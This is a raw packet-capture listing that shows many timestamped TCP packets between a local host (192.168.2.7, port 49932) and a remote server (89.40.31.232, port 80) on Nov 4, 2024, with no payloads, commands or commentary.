                                                              Nov 4, 2024 09:27:57.822499990 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.822537899 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.822550058 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.822562933 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.822582006 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.822611094 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.822679043 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.822690964 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.822704077 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.822715998 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.822726965 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.822727919 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.822738886 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.822753906 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.822762012 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.822771072 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.822781086 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.822789907 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.822793961 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.822820902 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.822833061 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.822905064 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.822918892 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.822928905 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.822941065 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.822952032 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.822957993 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.822992086 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.823004007 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.823059082 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.823071957 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.823082924 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.823095083 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.823107958 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.823117971 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.823123932 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.823142052 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.823163986 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.838587046 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.838598967 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.838617086 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.838629961 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.838641882 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.838654041 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.838654041 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.838699102 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.839159966 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.839180946 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.839202881 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.839219093 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.839221954 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.839241028 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.839246988 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.839265108 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.839268923 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.839288950 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.839288950 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.839303017 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.839318991 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.839325905 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.839339018 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.839349985 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.839353085 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.839374065 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.839378119 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.839389086 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.839396000 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.839402914 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.839416981 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.839423895 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.839430094 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.839443922 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.839447021 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.839452028 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.839459896 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.839473963 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.839484930 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.839493990 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.839523077 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.839528084 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.839548111 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.839561939 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.839567900 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.839577913 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.839589119 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.839606047 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.839621067 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.839653969 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.839660883 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.839673996 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.839685917 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.839699030 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.839709997 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.839713097 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.839740038 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.839761972 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.839777946 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.839790106 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.839802980 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.839814901 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.839828968 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.839832067 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.839854002 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.839886904 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.839905977 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.839916945 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.839927912 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.839941025 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.839946985 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.839956045 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.839971066 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.839987040 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.839994907 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.840111017 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.840293884 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.840308905 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.840322018 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.840348005 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.840377092 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.840383053 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.840394974 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.840409040 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.840421915 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.840441942 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.840457916 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.840465069 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.840473890 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.840487957 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.840502024 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.840514898 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.840514898 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.840547085 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.840573072 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.840585947 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.840607882 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.840640068 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.840704918 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.840717077 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.840728998 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.840739012 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.840744019 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.840775967 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.840787888 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.840799093 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.840812922 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.840826988 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.840838909 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.840847969 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.840853930 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.840886116 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.840898991 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.840898991 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.840898991 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.840936899 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.840960979 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.840990067 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.841001987 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.841013908 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.841027021 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.841033936 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.841063976 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.841135025 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.841147900 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.841161013 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.841171980 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.841172934 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.841187000 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.841197968 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.841222048 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.841238976 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.841243029 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.841254950 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.841283083 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.841326952 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.841363907 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.841377020 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.841391087 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.841398001 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.841403961 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.841414928 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.841418982 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.841424942 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.841433048 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.841435909 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.841451883 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.841453075 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.841465950 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.841478109 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.841506958 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.841605902 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.841618061 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.841629982 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.841641903 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.841646910 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.841655016 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.841666937 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.841675043 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.841679096 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.841718912 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.841718912 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.841746092 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.841759920 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.841772079 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.841784954 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.841795921 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.841798067 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.841824055 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.841835976 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.872649908 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.872673035 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.872687101 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.872721910 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.872752905 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.917083979 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.917100906 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.917112112 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.917133093 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.917145967 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.917151928 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.917159081 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.917197943 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.938708067 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.938720942 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.938733101 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.938833952 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.938847065 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.938858986 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.938873053 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.938886881 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.938888073 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.938918114 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.938956022 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.938965082 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.938968897 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.938977003 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.939006090 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.939024925 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.939039946 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.939053059 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.939064980 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.939079046 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.939090967 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.939125061 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.939160109 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.939172029 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.939183950 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.939198017 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.939209938 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.939210892 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.939218998 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.939219952 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.939230919 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.939251900 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.939284086 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.939286947 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.939301014 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.939325094 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.939337969 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.939337969 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.939354897 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.939368010 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.939394951 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.939440012 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.939450979 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.939486980 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.939521074 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.939538002 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.939552069 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.939563990 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.939579964 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.939595938 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.939620972 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.939667940 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.939681053 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.939692974 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.939706087 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.939716101 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.939726114 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.939730883 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.939743996 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.939753056 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.939781904 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.939814091 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.939832926 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.939846039 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.939857960 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.939861059 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.939872026 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.939884901 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.939886093 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.939913988 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.939929008 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.940130949 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.940145016 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.940156937 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.940169096 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.940191984 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.940215111 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.955369949 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.955395937 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.955406904 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.955435038 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.955440044 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.955446959 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.955461979 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.955471992 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.955495119 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.955509901 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.955522060 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.955533981 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.955544949 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.955563068 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.955583096 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.955811024 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.955871105 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.955882072 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.955899954 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.955913067 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.955914974 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.955929041 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.955952883 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.955961943 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.955993891 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.956006050 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.956012011 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.956018925 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.956037045 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.956063032 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.956078053 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.956120014 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.956141949 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.956155062 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.956180096 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.956183910 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.956193924 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.956202984 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.956206083 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.956217051 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.956233978 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.956245899 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.956296921 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.956310034 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.956324100 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.956337929 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.956350088 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.956377983 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.956402063 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.956415892 CET804993289.40.31.232192.168.2.7
